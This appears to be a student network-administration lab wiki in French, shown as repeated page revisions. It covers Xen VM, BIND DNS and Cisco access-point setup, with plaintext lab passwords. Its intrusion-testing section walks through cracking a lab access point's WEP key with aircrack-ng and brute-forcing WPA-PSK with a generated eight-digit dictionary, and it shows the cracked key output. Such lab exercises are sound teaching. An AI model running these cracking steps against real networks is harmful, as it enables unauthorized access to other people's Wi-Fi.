Pour accéder à la machine virtuelle via ssh il faut desormais taper la commande suivante :&lt;br /&gt;
 ssh@193.48.57.173&lt;br /&gt;
&lt;br /&gt;
'''Configuration DNS'''&lt;br /&gt;
&lt;br /&gt;
- Achat du nom de domaine via gandi.net : toad59.site&lt;br /&gt;
&lt;br /&gt;
- Associer le nom de domaine à l'adresse ip dans gandi, dans l'onglet Glue Records --&amp;gt; Add&lt;br /&gt;
&lt;br /&gt;
- Dans l'onglet Nameserver, sélectionner change puis :&lt;br /&gt;
Nameserver1 : ns.toad59.site&lt;br /&gt;
Nameserver2 : ns.gandi6.net&lt;br /&gt;
&lt;br /&gt;
- Modifier le fichier '''/etc/bind/named.conf.options''', qui gère les options de configuration du DNS :&lt;br /&gt;
 options {&lt;br /&gt;
         directory &amp;quot;/var/cache/bind&amp;quot;;&lt;br /&gt;
         #dnssec-validation auto;&lt;br /&gt;
         listen-on-v6 { any; };&lt;br /&gt;
         allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
 };&lt;br /&gt;
 acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
         217.70.177.40/32;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
- Modifier le fichier de configuration '''/etc/bind/db.toad59.site''' &lt;br /&gt;
 $TTL 3600&lt;br /&gt;
 @ IN SOA ns.toad59.site. postmaster.toad59.site. (&lt;br /&gt;
       1               ; Version&lt;br /&gt;
       1800             ; Refresh (30m)&lt;br /&gt;
       600             ; Retry   (10m)&lt;br /&gt;
       3600             ; Expire (1h)&lt;br /&gt;
       3600 )           ; Minimum TTL (1h)&lt;br /&gt;
 @ IN NS ns.toad59.site.&lt;br /&gt;
 @ IN NS ns6.gandi.net.&lt;br /&gt;
 ns      IN A       193.48.57.173&lt;br /&gt;
&lt;br /&gt;
- Modifier le fichier '''/etc/bind/named.conf.local''' pour déclarer les zones associées au domaine : &lt;br /&gt;
 zone &amp;quot;toad59.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;etc/bind/db.toad59.site&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
== Passerelle capbreton ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Une passerelle doit être mise en place sur capbreton, pour relier les VM.&lt;br /&gt;
Il faut modifier le fichier interfaces :&lt;br /&gt;
&lt;br /&gt;
 nano /etc/network/interfaces&lt;br /&gt;
On identifie les ports ethernet sur lesquels nous sommes câblés :&lt;br /&gt;
 ethtool -p ether n&lt;br /&gt;
Avec n numéro de port. &lt;br /&gt;
&lt;br /&gt;
Nous sommes câblés sur les ports suivants :&lt;br /&gt;
- ether7 : fibré pour aller jusqu'au routeur 6509&lt;br /&gt;
- ether6 : fibré pour aller jusqu'au routeur 9200&lt;br /&gt;
&lt;br /&gt;
Configurer la passerelle comme ci-dessous :&lt;br /&gt;
 auto IMA2a5&lt;br /&gt;
 iface IMA2a5 inet manual&lt;br /&gt;
  bridge_ports eth6 eth7&lt;br /&gt;
 # Bridge for L3MRIT group&lt;br /&gt;
 #&lt;br /&gt;
&lt;br /&gt;
Déconfigurer, puis configurer l'interface réseau :&lt;br /&gt;
 ifdown IMA2a5&lt;br /&gt;
 ifup IMAa5&lt;br /&gt;
&lt;br /&gt;
Vérifier la configuration :&lt;br /&gt;
 brctl show&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration du point d'accés wifi ==&lt;br /&gt;
&lt;br /&gt;
'''Réinitialisation des paramètres de la borne wifi :'''&lt;br /&gt;
 erase startup config&lt;br /&gt;
 reload&lt;br /&gt;
&lt;br /&gt;
'''Configuration de base :'''&lt;br /&gt;
 ap&amp;gt;enable&lt;br /&gt;
 ap#configure terminal&lt;br /&gt;
&lt;br /&gt;
'''Configuration du nom d'hôte :'''&lt;br /&gt;
 ap(config)#hostname SE2A5-AP1&lt;br /&gt;
&lt;br /&gt;
'''Accès ssh :'''&lt;br /&gt;
 SE2A5-AP1(config)#aaa new-model&lt;br /&gt;
 SE2A5-AP1(config)#username admin privilege 15 secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#ip domain-name plil.info&lt;br /&gt;
 SE2A5-AP1(config)#crypto key generate rsa general-keys modulus 2048&lt;br /&gt;
 SE2A5-AP1(config)#ip ssh version 2&lt;br /&gt;
 SE2A5-AP1(config)#line vty 0 15&lt;br /&gt;
 SE2A5-AP1(config-line)#transport input ssh&lt;br /&gt;
 SE2A5-AP1(config-line)#exit&lt;br /&gt;
&lt;br /&gt;
'''Sécurisation des accès :'''&lt;br /&gt;
 SE2A5-AP1(config)#service password-encryption&lt;br /&gt;
 SE2A5-AP1(config)#enable secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#banner motd #Restricted Access#&lt;br /&gt;
&lt;br /&gt;
'''VLAN 173'''&lt;br /&gt;
 aaa authentication login EAP_TOAD group RADIUS_TOAD&lt;br /&gt;
 radius-server host 193.48.57.173 auth-port 1812 acct-port 1813 key glopglop&lt;br /&gt;
 aaa group server radius RADIUS_TOAD&lt;br /&gt;
 server 193.48.57.173 auth-port 1812 acct-port 1813&lt;br /&gt;
 exit&lt;br /&gt;
 dot11 ssid TOAD1&lt;br /&gt;
 mbssid guest-mode&lt;br /&gt;
 vlan 173&lt;br /&gt;
 authentication open eap EAP_TOAD&lt;br /&gt;
 authentication network-eap EAP_TOAD&lt;br /&gt;
 authentication key-management wpa&lt;br /&gt;
 exit&lt;br /&gt;
 interface dot11radio0.173&lt;br /&gt;
 encapsulation dot1q 173&lt;br /&gt;
 bridge-group 73&lt;br /&gt;
 exit&lt;br /&gt;
 interface g0.173&lt;br /&gt;
 encapsulation dot1q 173&lt;br /&gt;
 bridge-group 73&lt;br /&gt;
 exit&lt;br /&gt;
 interface dot11radio 0&lt;br /&gt;
 no shutdown&lt;br /&gt;
 encryption vlan 173 mode ciphers aes-ccm tkip&lt;br /&gt;
 mbssid&lt;br /&gt;
 ssid TOAD1&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration de la liaison routeur 3500 vers 9200 ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Afficher la liste des interfaces du routeur 3500 et leurs états :&lt;br /&gt;
 sh ip interface brief&lt;br /&gt;
On constate que le port G0/39 est désactivé pour le moment.&lt;br /&gt;
Il faut le relier au routeur 3500 via le VLAN 532.&lt;br /&gt;
&lt;br /&gt;
'''Configuration :'''&lt;br /&gt;
 configure t&lt;br /&gt;
 interface G0/39&lt;br /&gt;
 switchport access vlan 532&lt;br /&gt;
 switchport mode access&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Tests d'intrusion ==&lt;br /&gt;
'''Cassage de clef WEP d'un point d'accès WiFi'''&lt;br /&gt;
- Brancher une clef wifi sur le PC&lt;br /&gt;
&lt;br /&gt;
- Installer le paquet aircrack.ng&lt;br /&gt;
&lt;br /&gt;
- On peut lister les interfaces disponibles, en activant le mode moniteur de la carte réseau :&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
- Passer la carte WiFi en mode moniteur, espion du réseau sans fil :&lt;br /&gt;
 airmon-ng start wlan0mon &lt;br /&gt;
wlan0mon est le nouveau nom de la carte réseau donné par défaut car le précédent est considéré comme trop long par la machine.&lt;br /&gt;
&lt;br /&gt;
- Obtenir les trames WiFi sur tous les canaux :&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
- Noter le SSID de la machine à attaquer, ici cracotte03 : '''04:DA:D2:9C:50:53'''&lt;br /&gt;
&lt;br /&gt;
- Visulaiser les informations de cracotte03 : &lt;br /&gt;
 airodump-ng --channel 3 --bssid 04:DA:D2:9C:50:53 wlan0mon&lt;br /&gt;
- Récupérer dans un fichier .cap toutes les données qui transitent sur le channel 3, uniquement les paquets échangés avec cracotte03 :&lt;br /&gt;
 airodump-ng -w lcrack -c 3 --bssid 04:DA:D2:9C:50:53 wlan0mon&lt;br /&gt;
J'attends qu'il y ai environ 30 000 trames de volées, ce processus prend un peu de temps.&lt;br /&gt;
&lt;br /&gt;
- Lancer le décryptage de la clef WEP : &lt;br /&gt;
 aircrack-ng lcrack-03.cap&lt;br /&gt;
Résultat :&lt;br /&gt;
  &lt;br /&gt;
                                                                        [00:00:00] Tested 813 keys (got 74481 IVs)&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/ 17   F1(96512) E7(85504) BD(84992) 6F(84736) F2(83968) FA(83712) 12(83456) 0E(82688) C8(82176) 6A(81920) 70(81664) 11(81408) 95(81408) E9(81408) 75(81152) &lt;br /&gt;
    1    0/  1   8E(105472) 34(86016) B3(84480) 54(84224) 2A(83456) B9(83456) 87(82688) 06(82432) 64(82432) 65(82176) 21(81920) 8D(81664) 61(81408) 2F(81152) 3C(81152) &lt;br /&gt;
    2    5/  2   7E(83968) 0E(82432) BF(82432) A2(82176) 0A(81920) 9C(81920) A8(81664) DF(81664) E2(81664) A7(81408) B4(81408) 33(80896) 58(80896) 90(80640) 16(80384) &lt;br /&gt;
    3   17/  3   5B(80896) B2(80640) 5A(80384) B1(80384) C4(80384) F6(79616) 03(79360) 33(79360) DA(79360) 73(79104) 9E(79104) 30(78848) 86(78848) AD(78848) D6(78848) &lt;br /&gt;
    4    0/  1   71(107008) 8D(86528) 03(83712) 7A(83712) 5E(83200) AF(82944) 50(82688) CF(82688) 54(82432) C0(82432) 21(82176) BE(81920) CB(81920) 1A(81664) B5(81408) &lt;br /&gt;
        KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:09:99:99:99 ] &lt;br /&gt;
        Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
On constate que 813 clef ont été testées avant de trouver la bonne.&lt;br /&gt;
&lt;br /&gt;
'''Cassage de mot de passe WPA-PSK'''&lt;br /&gt;
&lt;br /&gt;
- Visualiser les interfaces&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
- Noter le SSID de la machine à attaquer :&lt;br /&gt;
 44:AD:D9:5F:87:02  -40        3        0    0   8  54e. WPA2 CCMP   PSK  kracotte03 &lt;br /&gt;
&lt;br /&gt;
- Coder un &amp;quot;dictionnaire&amp;quot; en C. On suppose que la clef WPA est un code de 8 chiffres :&lt;br /&gt;
 vim dico.c&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 int main(void){&lt;br /&gt;
        int x = 0;&lt;br /&gt;
        for(x=0; x&amp;lt;=99999999; x++){&lt;br /&gt;
                 printf(&amp;quot;%08d\n&amp;quot;,x);&lt;br /&gt;
        }&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
- Compiler dico.c :&lt;br /&gt;
 gcc -Wall dico.c&lt;br /&gt;
&lt;br /&gt;
- Executer dico.c :&lt;br /&gt;
 ./a.out | more&lt;br /&gt;
&lt;br /&gt;
- Enregistrer le résultat du code dans un fichier txt :&lt;br /&gt;
 ./a.out &amp;gt; dico.txt&lt;br /&gt;
&lt;br /&gt;
- Lancer le traitement de lcrack-03 par dico.txt :&lt;br /&gt;
 aircrack-ng -w dico.txt lcrack-03&lt;/div&gt;</summary>
		<author><name>Yhaloua1</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G13&amp;diff=56395</id>
		<title>TP sysres IMA2a5 2021/2022 G13</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G13&amp;diff=56395"/>
				<updated>2021-11-19T09:37:49Z</updated>
		
		<summary type="html">&lt;p&gt;Yhaloua1 : /* Installation de la machine virtuelle */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
== Installation de la machine virtuelle ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Connexion sur le disque de virtualisation :'''&lt;br /&gt;
 su -&lt;br /&gt;
 ssh -4 capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
'''Installation dans la machine virtuelle Xen'''&lt;br /&gt;
&lt;br /&gt;
Création de la machine virtuelle :&lt;br /&gt;
 xen-create-image --hostname=Toad --ip=193.48.57.173 --gateway=193.48.57.174 --dir=/usr/local/xen --dist=buster&lt;br /&gt;
Veiller à noter le mot de passe de la MV à cette étape. Celui-ci peut-être retrouvé à l'aide de la commande :&lt;br /&gt;
 tail -f /var/log/xen-tools/Toad.log&lt;br /&gt;
Vérifier la création de la MV en se rendant sur les répertoires:&lt;br /&gt;
 ls /etc/xen&lt;br /&gt;
 ls /usr/local/xen&lt;br /&gt;
Pour les disques : configuration RAID 5&lt;br /&gt;
Administration de volume logique :&lt;br /&gt;
 lvcreate -L1G -n Toad1&lt;br /&gt;
 lvcreate -L1G -n Toad2&lt;br /&gt;
 lvcreate -L1G -n Toad3&lt;br /&gt;
 lvcreate -L1G -n Toad4&lt;br /&gt;
&lt;br /&gt;
Les volumes logiques sont par défaut de 1GiB.&lt;br /&gt;
Augmenter la taille des volumes logiques:&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad1&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad2&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad3&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad4&lt;br /&gt;
&lt;br /&gt;
Vérifier avec :&lt;br /&gt;
 lvdisplay&lt;br /&gt;
&lt;br /&gt;
Créer un système de fichiers étendu :&lt;br /&gt;
 mke2fs /dev/virtual/Toad1&lt;br /&gt;
 mke2fs /dev/virtual/Toad2&lt;br /&gt;
 mke2fs /dev/virtual/Toad3&lt;br /&gt;
 mke2fs /dev/virtual/Toad4&lt;br /&gt;
&lt;br /&gt;
Création et modification du fichier de configuration :&lt;br /&gt;
 xen create /etc/xen/Toad.cfg&lt;br /&gt;
 vim Toad.cfg&lt;br /&gt;
&lt;br /&gt;
Dans Networking, supprimer l'@ IP et définir : &lt;br /&gt;
 bridge = IMA2a5&lt;br /&gt;
Pour prenndre en compte les disques créés dans la MV, dans '''disk''', ajouter :&lt;br /&gt;
 'phy:/dev/virtual/Toad1, xvda3, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad2, xvda4, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad3, xvda5, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad4, xvda6, w'&lt;br /&gt;
&lt;br /&gt;
Lancer la MV avec la commande :&lt;br /&gt;
 xen create /etc/xen/Toad.cfg&lt;br /&gt;
&lt;br /&gt;
On peut vérifier que la MV est démarrée avec la commande :&lt;br /&gt;
 xl list&lt;br /&gt;
&lt;br /&gt;
Pour se connecter à la console de la MV :&lt;br /&gt;
 xen console Toad&lt;br /&gt;
Avec login : root et password : celui qui a été noté au début.&lt;br /&gt;
&lt;br /&gt;
Si besoin de changer le mot de passe :&lt;br /&gt;
 passwd root&lt;br /&gt;
&lt;br /&gt;
'''Configuration de la machine virtuelle'''&lt;br /&gt;
&lt;br /&gt;
Installer les packages dont nous avons besoin :&lt;br /&gt;
 apt-get update&lt;br /&gt;
&lt;br /&gt;
'''Configuration réseau'''&lt;br /&gt;
&lt;br /&gt;
Pour permettre l'accès à internet à ma machine virtuelle, je modifie le fichier suivant : &lt;br /&gt;
&lt;br /&gt;
/etc/networks/interfaces &lt;br /&gt;
&lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet6 auto&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 10.60.100.173/24&lt;br /&gt;
  up ip address add dev eth0 193.48.57.173/32 ; ip route add default via 10.60.100.254 src 193.48.57.173&lt;br /&gt;
  down ip address del dev eth0 193.48.57.173/32 ; ip route del default via 10.60.100.254 src 193.48.57.173&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Configuration ssh'''&lt;br /&gt;
&lt;br /&gt;
Pour permettre l'accès à ma machine virtuelle via ssh, je modifie le fichier suivant :&lt;br /&gt;
&lt;br /&gt;
/etc/ssh/sshd_config&lt;br /&gt;
&lt;br /&gt;
 PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Relancer le service ssh :&lt;br /&gt;
&lt;br /&gt;
 service ssh restart&lt;br /&gt;
&lt;br /&gt;
Pour accéder à la machine virtuelle via ssh il faut desormais taper la commande suivante :&lt;br /&gt;
 ssh@193.48.57.173&lt;br /&gt;
&lt;br /&gt;
'''Configuration DNS'''&lt;br /&gt;
&lt;br /&gt;
- Achat du nom de domaine via gandi.net : toad59.site&lt;br /&gt;
&lt;br /&gt;
- Associer le nom de domaine à l'adresse ip dans gandi, dans l'onglet Glue Records --&amp;gt; Add&lt;br /&gt;
&lt;br /&gt;
- Dans l'onglet Nameserver, sélectionner change puis :&lt;br /&gt;
Nameserver1 : ns.toad59.site&lt;br /&gt;
Nameserver2 : ns.gandi6.net&lt;br /&gt;
&lt;br /&gt;
- Modifier le fichier '''/etc/bind/named.conf.options''', qui gère les options de configuration du DNS :&lt;br /&gt;
 options {&lt;br /&gt;
         directory &amp;quot;/var/cache/bind&amp;quot;;&lt;br /&gt;
         #dnssec-validation auto;&lt;br /&gt;
         listen-on-v6 { any; };&lt;br /&gt;
         allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
 };&lt;br /&gt;
 acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
         217.70.177.40/32;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
- Modifier le fichier de configuration '''/etc/bind/db.toad59.site''' &lt;br /&gt;
 $TTL 3600&lt;br /&gt;
 @ IN SOA ns.toad59.site. postmaster.toad59.site. (&lt;br /&gt;
       1               ; Version&lt;br /&gt;
       1800             ; Refresh (30m)&lt;br /&gt;
       600             ; Retry   (10m)&lt;br /&gt;
       3600             ; Expire (1h)&lt;br /&gt;
       3600 )           ; Minimum TTL (1h)&lt;br /&gt;
 @ IN NS ns.toad59.site.&lt;br /&gt;
 @ IN NS ns6.gandi.net.&lt;br /&gt;
 ns      IN A       193.48.57.173&lt;br /&gt;
&lt;br /&gt;
- Modifier le fichier '''/etc/bind/named.conf.local''' pour déclarer les zones associées au domaine : &lt;br /&gt;
 zone &amp;quot;toad59.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;etc/bind/db.toad59.site&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
== Passerelle capbreton ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Une passerelle doit être mise en place sur capbreton, pour relier les VM.&lt;br /&gt;
Il faut modifier le fichier interfaces :&lt;br /&gt;
&lt;br /&gt;
 nano /etc/network/interfaces&lt;br /&gt;
On identifie les ports ethernet sur lesquels nous sommes câblés :&lt;br /&gt;
 ethtool -p ether n&lt;br /&gt;
Avec n numéro de port. &lt;br /&gt;
&lt;br /&gt;
Nous sommes câblés sur les ports suivants :&lt;br /&gt;
- ether7 : fibré pour aller jusqu'au routeur 6509&lt;br /&gt;
- ether6 : fibré pour aller jusqu'au routeur 9200&lt;br /&gt;
&lt;br /&gt;
Configurer la passerelle comme ci-dessous :&lt;br /&gt;
 auto IMA2a5&lt;br /&gt;
 iface IMA2a5 inet manual&lt;br /&gt;
  bridge_ports eth6 eth7&lt;br /&gt;
 # Bridge for L3MRIT group&lt;br /&gt;
 #&lt;br /&gt;
&lt;br /&gt;
Déconfigurer, puis configurer l'interface réseau :&lt;br /&gt;
 ifdown IMA2a5&lt;br /&gt;
 ifup IMAa5&lt;br /&gt;
&lt;br /&gt;
Vérifier la configuration :&lt;br /&gt;
 brctl show&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration du point d'accés wifi ==&lt;br /&gt;
&lt;br /&gt;
'''Réinitialisation des paramètres de la borne wifi :'''&lt;br /&gt;
 erase startup config&lt;br /&gt;
 reload&lt;br /&gt;
&lt;br /&gt;
'''Configuration de base :'''&lt;br /&gt;
 ap&amp;gt;enable&lt;br /&gt;
 ap#configure terminal&lt;br /&gt;
&lt;br /&gt;
'''Configuration du nom d'hôte :'''&lt;br /&gt;
 ap(config)#hostname SE2A5-AP1&lt;br /&gt;
&lt;br /&gt;
'''Accès ssh :'''&lt;br /&gt;
 SE2A5-AP1(config)#aaa new-model&lt;br /&gt;
 SE2A5-AP1(config)#username admin privilege 15 secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#ip domain-name plil.info&lt;br /&gt;
 SE2A5-AP1(config)#crypto key generate rsa general-keys modulus 2048&lt;br /&gt;
 SE2A5-AP1(config)#ip ssh version 2&lt;br /&gt;
 SE2A5-AP1(config)#line vty 0 15&lt;br /&gt;
 SE2A5-AP1(config-line)#transport input ssh&lt;br /&gt;
 SE2A5-AP1(config-line)#exit&lt;br /&gt;
&lt;br /&gt;
'''Sécurisation des accès :'''&lt;br /&gt;
 SE2A5-AP1(config)#service password-encryption&lt;br /&gt;
 SE2A5-AP1(config)#enable secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#banner motd #Restricted Access#&lt;br /&gt;
&lt;br /&gt;
'''VLAN 173'''&lt;br /&gt;
 aaa authentication login EAP_TOAD group RADIUS_TOAD&lt;br /&gt;
 radius-server host 193.48.57.173 auth-port 1812 acct-port 1813 key glopglop&lt;br /&gt;
 aaa group server radius RADIUS_TOAD&lt;br /&gt;
 server 193.48.57.173 auth-port 1812 acct-port 1813&lt;br /&gt;
 exit&lt;br /&gt;
 dot11 ssid TOAD1&lt;br /&gt;
 mbssid guest-mode&lt;br /&gt;
 vlan 173&lt;br /&gt;
 authentication open eap EAP_TOAD&lt;br /&gt;
 authentication network-eap EAP_TOAD&lt;br /&gt;
 authentication key-management wpa&lt;br /&gt;
 exit&lt;br /&gt;
 interface dot11radio0.173&lt;br /&gt;
 encapsulation dot1q 173&lt;br /&gt;
 bridge-group 73&lt;br /&gt;
 exit&lt;br /&gt;
 interface g0.173&lt;br /&gt;
 encapsulation dot1q 173&lt;br /&gt;
 bridge-group 73&lt;br /&gt;
 exit&lt;br /&gt;
 interface dot11radio 0&lt;br /&gt;
 no shutdown&lt;br /&gt;
 encryption vlan 173 mode ciphers aes-ccm tkip&lt;br /&gt;
 mbssid&lt;br /&gt;
 ssid TOAD1&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration de la liaison routeur 3500 vers 9200 ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Afficher la liste des interfaces du routeur 3500 et leurs états :&lt;br /&gt;
 sh ip interface brief&lt;br /&gt;
On constate que le port G0/39 est désactivé pour le moment.&lt;br /&gt;
Il faut le relier au routeur 3500 via le VLAN 532.&lt;br /&gt;
&lt;br /&gt;
'''Configuration :'''&lt;br /&gt;
 configure t&lt;br /&gt;
 interface G0/39&lt;br /&gt;
 switchport access vlan 532&lt;br /&gt;
 switchport mode access&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Tests d'intrusion ==&lt;br /&gt;
'''Cassage de clef WEP d'un point d'accès WiFi'''&lt;br /&gt;
- Brancher une clef wifi sur le PC&lt;br /&gt;
&lt;br /&gt;
- Installer le paquet aircrack.ng&lt;br /&gt;
&lt;br /&gt;
- On peut lister les interfaces disponibles, en activant le mode moniteur de la carte réseau :&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
- Passer la carte WiFi en mode moniteur, espion du réseau sans fil :&lt;br /&gt;
 airmon-ng start wlan0mon &lt;br /&gt;
wlan0mon est le nouveau nom de la carte réseau donné par défaut car le précédent est considéré comme trop long par la machine.&lt;br /&gt;
&lt;br /&gt;
- Obtenir les trames WiFi sur tous les canaux :&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
- Noter le SSID de la machine à attaquer, ici cracotte03 : '''04:DA:D2:9C:50:53'''&lt;br /&gt;
&lt;br /&gt;
- Visulaiser les informations de cracotte03 : &lt;br /&gt;
 airodump-ng --channel 3 --bssid 04:DA:D2:9C:50:53 wlan0mon&lt;br /&gt;
- Récupérer dans un fichier .cap toutes les données qui transitent sur le channel 3, uniquement les paquets échangés avec cracotte03 :&lt;br /&gt;
 airodump-ng -w lcrack -c 3 --bssid 04:DA:D2:9C:50:53 wlan0mon&lt;br /&gt;
J'attends qu'il y ai environ 30 000 trames de volées, ce processus prend un peu de temps.&lt;br /&gt;
&lt;br /&gt;
- Lancer le décryptage de la clef WEP : &lt;br /&gt;
 aircrack-ng lcrack-03.cap&lt;br /&gt;
Résultat :&lt;br /&gt;
  &lt;br /&gt;
                                                                        [00:00:00] Tested 813 keys (got 74481 IVs)&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/ 17   F1(96512) E7(85504) BD(84992) 6F(84736) F2(83968) FA(83712) 12(83456) 0E(82688) C8(82176) 6A(81920) 70(81664) 11(81408) 95(81408) E9(81408) 75(81152) &lt;br /&gt;
    1    0/  1   8E(105472) 34(86016) B3(84480) 54(84224) 2A(83456) B9(83456) 87(82688) 06(82432) 64(82432) 65(82176) 21(81920) 8D(81664) 61(81408) 2F(81152) 3C(81152) &lt;br /&gt;
    2    5/  2   7E(83968) 0E(82432) BF(82432) A2(82176) 0A(81920) 9C(81920) A8(81664) DF(81664) E2(81664) A7(81408) B4(81408) 33(80896) 58(80896) 90(80640) 16(80384) &lt;br /&gt;
    3   17/  3   5B(80896) B2(80640) 5A(80384) B1(80384) C4(80384) F6(79616) 03(79360) 33(79360) DA(79360) 73(79104) 9E(79104) 30(78848) 86(78848) AD(78848) D6(78848) &lt;br /&gt;
    4    0/  1   71(107008) 8D(86528) 03(83712) 7A(83712) 5E(83200) AF(82944) 50(82688) CF(82688) 54(82432) C0(82432) 21(82176) BE(81920) CB(81920) 1A(81664) B5(81408) &lt;br /&gt;
        KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:09:99:99:99 ] &lt;br /&gt;
        Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
On constate que 813 clef ont été testées avant de trouver la bonne.&lt;br /&gt;
&lt;br /&gt;
'''Cassage de mot de passe WPA-PSK'''&lt;br /&gt;
&lt;br /&gt;
- Visualiser les interfaces&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
- Noter le SSID de la machine à attaquer :&lt;br /&gt;
 44:AD:D9:5F:87:02  -40        3        0    0   8  54e. WPA2 CCMP   PSK  kracotte03 &lt;br /&gt;
&lt;br /&gt;
- Coder un &amp;quot;dictionnaire&amp;quot; en C. On suppose que la clef WPA est un code de 8 chiffres :&lt;br /&gt;
 vim dico.c&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 int main(void){&lt;br /&gt;
        int x = 0;&lt;br /&gt;
        for(x=0; x&amp;lt;=99999999; x++){&lt;br /&gt;
                 printf(&amp;quot;%08d\n&amp;quot;,x);&lt;br /&gt;
        }&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
- Compiler dico.c :&lt;br /&gt;
 gcc -Wall dico.c&lt;br /&gt;
&lt;br /&gt;
- Executer dico.c :&lt;br /&gt;
 ./a.out | more&lt;br /&gt;
&lt;br /&gt;
- Enregistrer le résultat du code dans un fichier txt :&lt;br /&gt;
 ./a.out &amp;gt; dico.txt&lt;br /&gt;
&lt;br /&gt;
- Lancer le traitement de lcrack-03 par dico.txt :&lt;br /&gt;
 aircrack-ng -w dico.txt lcrack-03&lt;/div&gt;</summary>
		<author><name>Yhaloua1</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G13&amp;diff=56394</id>
		<title>TP sysres IMA2a5 2021/2022 G13</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G13&amp;diff=56394"/>
				<updated>2021-11-19T09:35:38Z</updated>
		
		<summary type="html">&lt;p&gt;Yhaloua1 : /* Installation de la machine virtuelle */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
== Installation de la machine virtuelle ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Connexion sur le disque de virtualisation :'''&lt;br /&gt;
 su -&lt;br /&gt;
 ssh -4 capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
'''Installation dans la machine virtuelle Xen'''&lt;br /&gt;
&lt;br /&gt;
Création de la machine virtuelle :&lt;br /&gt;
 xen-create-image --hostname=Toad --ip=193.48.57.173 --gateway=193.48.57.174 --dir=/usr/local/xen --dist=buster&lt;br /&gt;
Veiller à noter le mot de passe de la MV à cette étape. Celui-ci peut-être retrouvé à l'aide de la commande :&lt;br /&gt;
 tail -f /var/log/xen-tools/Toad.log&lt;br /&gt;
Vérifier la création de la MV en se rendant sur les répertoires:&lt;br /&gt;
 ls /etc/xen&lt;br /&gt;
 ls /usr/local/xen&lt;br /&gt;
Pour les disques : configuration RAID 5&lt;br /&gt;
Administration de volume logique :&lt;br /&gt;
 lvcreate -L1G -n Toad1&lt;br /&gt;
 lvcreate -L1G -n Toad2&lt;br /&gt;
 lvcreate -L1G -n Toad3&lt;br /&gt;
 lvcreate -L1G -n Toad4&lt;br /&gt;
&lt;br /&gt;
Les volumes logiques sont par défaut de 1GiB.&lt;br /&gt;
Augmenter la taille des volumes logiques:&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad1&lt;br /&gt;
